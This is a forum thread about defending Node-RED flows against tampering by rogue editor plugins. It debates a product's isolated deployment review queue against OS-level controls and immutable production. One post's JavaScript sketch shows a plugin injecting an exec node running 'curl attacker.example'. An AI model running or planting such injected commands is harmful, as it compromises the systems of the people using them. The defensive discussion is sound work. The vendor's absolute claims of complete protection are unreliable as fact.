How to prevent Last-Mile Manipulation of Flows

Do you guys know a strategy to avoid flow tampering from the editor caused by evil plugins?

I created one for NRG Sentinel that doesn't use the editor, but I want to know if there is a reliable way to do it from the editor. Right now I believe it is impossible, because an editor with plugins can't be trusted.

Even if possible, it would not be a sensible security strategy.

Security assessments of a system must come from outside that system.

The sensible approach for something with a plugin/extension system is to pin what is installed and security-vet every plugin/custom node. In addition, Node-RED must run under its own user ID and group, and ACLs should be enforced to limit its access to files and folders.

As I've said before, Node-RED is a generic compute platform. As such it is incredibly powerful and, just like allowing access to PowerShell, Python, Node.js, etc on a user workstation, it must be constrained if working in a controlled environment such as is typical for an enterprise setup.

Node-RED was created to be convenient even for novice users to use. It therefore does sacrifice some level of security because of that. Thankfully, this is relatively easy to fix using the tools available in the host OS.


I will reveal my solution that gets rid of these attacks later today. I just wanted to know if people had some suggestions.

Sentinel’s Safe Deployment mechanism introduces a controlled review process for all flow changes.

When a user deploys a flow, the server does not apply the changes immediately. Instead, the proposed deployment is placed into a Deployments Queue.

To review the changes, the user opens the dedicated review interface at:

/nrg/plugins/sentinel/deployments/review

This page runs in an isolated environment with no client-side plugins loaded, preventing any editor plugins from interfering with or tampering with the review process.

During the review, Sentinel presents every detected change in the deployment. The user must inspect and explicitly approve or reject each modification. Only after all changes are approved will the deployment be finalized and the new flow activated.

In addition to the isolated review interface, server-side protections enforce capability and permission restrictions to prevent plugins or nodes from modifying the deployment queue or bypassing the approval process.

This architecture ensures that no flow change can become active without explicit human approval, protecting the runtime from both client-side and server-side tampering.

This marks the beginning of the vision for Sentinel’s Flow Diff tool. Whenever a deployment is requested, whether from the client or the server, it is not applied immediately. Instead, Sentinel intercepts the request and places it into a deployment queue.

Rather than following the normal deployment path, the proposed changes must pass through Sentinel’s Safe Deployment review process. This ensures that every modification to a flow can be inspected and approved before it is activated in the runtime.

Note: I will probably create a separate list in the editor to show enqueued deployments.

Deployments queued waiting for approval

When the user clicks “Open review page” in the editor, they are redirected to Sentinel’s Deployment Review interface. This page runs in an isolated environment where no editor plugins are loaded, preventing rogue client-side plugins from tampering with the review process.

Sentinel breaks each deployment into a structured Approval Process composed of multiple review steps. Changes are organized and presented by Node, Tab, and Wires, allowing the user to inspect them in a controlled and understandable way. Each step provides the appropriate context for validation, including visual flow diffs and property diffs where relevant.

The reviewer must go through these steps sequentially, validating each change before moving forward. Only after the entire review process is completed and all changes are approved will the queued deployment be applied to the runtime.
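The grouping into review steps could be sketched roughly like this, assuming flows are the usual array of node objects with `id` and `wires` (the function name is hypothetical, not Sentinel's code):

```javascript
// Compare two flow arrays and bucket the differences into review steps:
// added/removed nodes, changed properties, and rewired connections.
function diffFlows(oldFlows, newFlows) {
  const oldById = new Map(oldFlows.map((n) => [n.id, n]));
  const newById = new Map(newFlows.map((n) => [n.id, n]));

  const steps = { added: [], removed: [], changed: [], rewired: [] };

  for (const [id, node] of newById) {
    const prev = oldById.get(id);
    if (!prev) {
      steps.added.push(id);
      continue;
    }
    // Separate wiring changes from property changes so they can be
    // reviewed as distinct steps.
    const { wires: oldWires, ...oldProps } = prev;
    const { wires: newWires, ...newProps } = node;
    if (JSON.stringify(oldProps) !== JSON.stringify(newProps)) steps.changed.push(id);
    if (JSON.stringify(oldWires || []) !== JSON.stringify(newWires || [])) steps.rewired.push(id);
  }
  for (const id of oldById.keys()) {
    if (!newById.has(id)) steps.removed.push(id);
  }
  return steps;
}
```

Each bucket then maps onto one sequential review step, so a rewired node cannot be approved as a mere property tweak.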

This structured approval workflow ensures that any unintended or malicious modification—such as those introduced by a compromised or rogue plugin—can be detected and stopped before it affects the running flow.




Note: I'm going to update the look and feel to match the editor's, and use the RED canvas to render the nodes and wires, once I finish the core features of Sentinel's Flow Diff tool.

Once all changes have been reviewed and approved, the user can proceed by clicking the Deploy button. At this point, a confirmation modal appears before the deployment is finalized.

By requiring this explicit review and confirmation workflow, NRG Sentinel ensures that no flow tampering can occur without the user noticing and approving the changes.

NRG Sentinel can be found here

Looks like you put a lot of effort in this.

What I am wondering: is this all based on the assumption that changes/deployments are made directly in production environments?

If production is air-gapped and changes are tightly controlled via processes and CI/CD, how do you see this working? I concur with @TotallyInformation that security should be done from the outside: account/password retrieval, who had access and when, everything change-controlled and audited (ITIL/ITSM), especially in enterprise environments.

Although I have not used FlowFuse, I can imagine that hash comparison/verification of dev/test > prod deployments would make sense.

I think what @AllanOricil describes here is really relevant. If you use NR in production, I can imagine the tool helping in the verification process, especially if shared nodes are being used (for free) in the customer delivery.

I concur with @bakman2 - however, this tool might find a place in a final test environment such as UAT. To do verification tests prior to production implementation. By the time you get to production, you should already be totally clear about what is being implemented, why and its implications on security, infrastructure, support, and end-users.

@bakman2 @TotallyInformation

People routinely apply patches to production packages assuming “it’s just a patch” and won’t impact their flows. That assumption doesn’t hold in Node-RED. A patch can change node behavior, tweak defaults, or introduce side effects—and it can even directly alter existing flows.

Blocking patches in production isn’t realistic. The ecosystem depends on continuous updates, and most patches are beneficial, including critical security fixes. Shutting that down would create more risk than it mitigates.

The real issue is lack of control and visibility.

Sentinel’s Deployment Review Queue addresses this head-on. Every patch, regardless of scope, triggers a mandatory flow review before it’s considered safe for production. This creates a hard checkpoint where any unintended—or malicious—changes to flows are surfaced.

If a patch attempts to modify flow logic or behavior, it doesn’t go unnoticed. It’s flagged, reviewed, and explicitly approved or rejected.

Bottom line: in a dynamic environment like Node-RED, patches are not harmless by default. Enforced review isn’t optional—it’s the only reliable control mechanism to protect flow integrity while maintaining update velocity.

That’s a solid starting point, but it doesn’t address the real risk surface.

Hash comparison assumes the flow that gets deployed is exactly what the user reviewed. In Node-RED, that assumption breaks down. Editor plugins can modify the flow payload at the last mile—right before it’s sent to the runtime—after the user has already validated it visually. At that point, you’re hashing something that may already be compromised.
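To make the "last mile" concrete, here is a toy sketch (stand-in functions, not real Node-RED editor internals) of how a single wrapped transport function lets a plugin ship a payload the user never reviewed:

```javascript
// Stand-in for the HTTP POST the editor makes when deploying.
let sendToRuntime = (payload) => payload;

// By the time this runs, the user has already reviewed `reviewedFlows`
// visually in the editor.
function deploy(reviewedFlows) {
  return sendToRuntime(reviewedFlows);
}

// A rogue editor plugin only needs to wrap the transport once.
function installRoguePlugin() {
  const original = sendToRuntime;
  sendToRuntime = (payload) => {
    // Append a node the user never saw; 'attacker.example' is a
    // placeholder, not a real host.
    const tampered = [
      ...payload,
      { id: 'evil', type: 'exec', command: 'curl attacker.example' },
    ];
    return original(tampered);
  };
}
```

Any hash computed client-side after this hook runs would hash the tampered payload, which is why verification has to happen outside the plugin-loaded environment.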

You also lose attribution. Once a plugin mutates the flow, there’s no reliable way to tell whether a change was made intentionally by a human or injected programmatically. From a governance perspective, that’s unacceptable.

And this isn’t theoretical. Production environments are exposed to package patches that can introduce or alter editor-side behavior. A “safe” update can quietly ship logic that manipulates flows during deployment.

There’s only one reliable way to eliminate this class of risk: remove the attack surface at the point of verification.

That’s why Sentinel’s Deployment Review Queue is isolated. The review interface does not load any editor plugins—period. No extensions, no runtime hooks, no opportunity for last-mile manipulation. What the reviewer sees is the exact payload that will be deployed.

On top of that, every deployment is gated by mandatory human verification before activation. This ensures that any unauthorized or unexpected change—whether introduced upstream or at the last mile—is caught before it reaches production.

Bottom line: hashing ensures consistency, but it doesn’t guarantee integrity. If plugins are in the execution path, they are part of your threat model. The only way to control that is to take them out of the equation when it matters most.

Doesn't hold in nearly every case as it happens. However, these things sit under a risk-based management approach. You have to decide whether rapid patching is less or more of a risk than having a review before patching.

There is no one-size-fits-all approach here if you are being sensible. Each system should have its own risk log and business continuity runbook. Of course, we are in the realm of enterprise systems now and Node-RED is just as (perhaps more) likely to be in small-to-medium organisations without sufficient IT and Cyber Security cover.

Certainly not saying there isn't room for what you've created, clearly there is a place for it. Your tool isn't the only possible approach of course, but I'm sure there will be organisations that prefer it.

This is, of course, a good thing. Again, the only question would be whether having the tool in the platform undermines its security, we've raised that already so no need to go back over it.

I get the impression that this security enhancement might be useful in a testing environment, but perhaps not in production.

It has, though, occurred to me that new and malicious/hacked versions on GitHub are a possible threat to Node-RED.

Assuming that any new release involves changes, how can you distinguish between a bugfix and a plugin gone bad?

Perhaps I'm wrong but the best approach to protecting a production system seems to be immutability. Precisely what needs to be immutable is far from clear though.

  • flows.json
  • flows_cred.json
  • settings.js

But perhaps it should be ~/.node-red, plus /usr/lib/node_modules.
Which would make file based context and other file system actions harder to manage.

Yes, however, there are already tools to mitigate such supply-chain risks. And some are free to use and so suitable for home automation use.

Again, not saying that Allan's tool doesn't have a place, it will do I'm sure.

Well, this is certainly part of what many of us have discussed in the past regarding security. You need layers, not just one thing. Running under a controlled user and group ID, with ACLs protecting your file system assets, is part of it. Having supply-chain checks in place is important.

The more value in your Node-RED instance, the more protection you should be aiming for of course.


Not really. I could create packages that target production only, so the change goes unnoticed in lower environments. Runtime protection is a must no matter the environment.

I started with JavaScript on both client and server in 2018. I explored React but moved away due to its lack of structure, then adopted Vue in 2019, which aligned better with how I build systems. In 2023, I began working with Node-RED. Along the way, several years as a Salesforce Developer significantly shaped my approach to designing this product. It’s been a deliberate, multi-year journey with a substantial investment of effort.

I also tend to question how things are done and actively challenge established approaches.

Perhaps an exception to the rule, but I work in an environment where this is unheard of. Production is considered immutable, software is qualified and tested (per version) before it is allowed anywhere near production, this also applies to libraries, plugins etc.

Blocking patches in production isn’t realistic.

This is all about 'willpower' and not taking your production environment seriously. Emergency fixes are somewhat different, but even those should be thoroughly tested, verified and approved in non-prod environments.


I think both quotes you pulled miss the core point I was making because you framed them in a different context than intended.

When I said:

“People routinely apply patches… assuming ‘it’s just a patch’ and won’t impact their flows”

the point wasn’t about teams lacking discipline or treating production casually. It’s about the assumption that patches are behaviorally safe, which is a separate issue.

And when I said:

“Blocking patches in production isn’t realistic”

that’s not about willpower or taking production lightly. It’s about operational constraints. Even in strict environments, patches—especially security-related—need to move, and they’re generally treated as low-risk by default.

The gap I’m pointing out is this:
current processes (testing in non-prod, automated checks, manual validation) are not designed to catch subtle behavioral changes introduced by patches in systems like Node-RED.

You can do everything “right” from a process standpoint and still miss:

  • changes in node behavior
  • default value shifts
  • hidden side effects that only manifest at runtime

So this isn’t a discipline problem — it’s a visibility problem.

That’s the distinction I’m trying to make.

or, to dev minds: A !== A && B

How would you distinguish development, test & production?